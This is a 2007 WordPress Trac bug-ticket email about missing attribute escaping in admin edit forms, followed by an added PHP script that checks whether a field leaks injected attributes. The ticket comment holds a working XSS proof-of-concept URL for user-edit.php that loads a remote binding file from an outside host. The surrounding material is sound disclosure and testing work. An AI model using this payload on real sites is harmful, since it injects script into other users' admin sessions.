[wp-trac] Re: [WordPress Trac] #4333: Some attribute_escape()s and relatives for edit forms

WordPress Trac wp-trac at lists.automattic.com
Sat May 26 05:29:04 GMT 2007


#4333: Some attribute_escape()s and relatives for edit forms
----------------------------+-----------------------------------------------
 Reporter:  mdawaffe        |        Owner:  rob1n   
     Type:  defect          |       Status:  reopened
 Priority:  high            |    Milestone:  2.2.1   
Component:  Administration  |      Version:  2.2     
 Severity:  normal          |   Resolution:          
 Keywords:                  |  
----------------------------+-----------------------------------------------
Comment (by g30rg3x):

 Well, I made some trunk-based patches for 2.2.
 Obviously I didn't add anything that is related to the trunk
 version.

 Also, I think that the trunk solution is incomplete because it doesn't filter
 the user-edit.php-based version of the bug:
 user-edit.php?user_id=1&wp_http_referer=%22style=-moz-binding:url(%22http://ha.ckers.org/xssmoz.xml%23xss%22)'

-- 
Ticket URL: <http://trac.wordpress.org/ticket/4333#comment:8>
WordPress Trac <http://trac.wordpress.org/>
WordPress blogging software
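
The following is an added example, not part of the ticket comment and not WordPress code. It renders the reported wp_http_referer value into a form field with and without attribute escaping, then parses the result to check for unexpected attributes. The hidden-field markup and the function names are assumptions, and htmlspecialchars() with ENT_QUOTES stands in for attribute_escape() so the script runs outside WordPress.

```php
<?php
// Added example: not WordPress code. The field markup below is an assumed
// stand-in for a form field that echoes wp_http_referer into an attribute.

// Query string as reported in the ticket comment.
$query = "user_id=1&wp_http_referer=%22style=-moz-binding:url(%22http://ha.ckers.org/xssmoz.xml%23xss%22)'";
parse_str($query, $params);          // URL-decodes %22 to " and %23 to #
$referer = $params['wp_http_referer'];

// "Before": value interpolated into a double-quoted attribute as-is.
function field_unescaped(string $value): string {
    return '<input type="hidden" name="wp_http_referer" value="' . $value . '" />';
}

// "After": quotes and angle brackets are encoded before output.
// htmlspecialchars(..., ENT_QUOTES) stands in for attribute_escape() here.
function field_escaped(string $value): string {
    return '<input type="hidden" name="wp_http_referer" value="'
        . htmlspecialchars($value, ENT_QUOTES, 'UTF-8') . '" />';
}

// Parse the rendered markup and list the attribute names on the <input>.
function input_attribute_names(string $html): array {
    libxml_use_internal_errors(true);   // tolerate the malformed "before" markup
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    libxml_clear_errors();
    $names = [];
    foreach ($doc->getElementsByTagName('input')->item(0)->attributes as $attr) {
        $names[] = $attr->nodeName;
    }
    return $names;
}

// The field should carry exactly these attributes; anything else means the
// request value closed the value="..." quote and added markup of its own.
$expected = ['type', 'name', 'value'];
$rendered = ['unescaped' => field_unescaped($referer), 'escaped' => field_escaped($referer)];
foreach ($rendered as $label => $html) {
    $extra = array_diff(input_attribute_names($html), $expected);
    printf("%-9s %s\n", $label, $extra ? 'extra attributes: ' . implode(', ', $extra) : 'ok');
}
```

The same attribute-list check can be reused as a regression test for any form field that echoes a request parameter.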

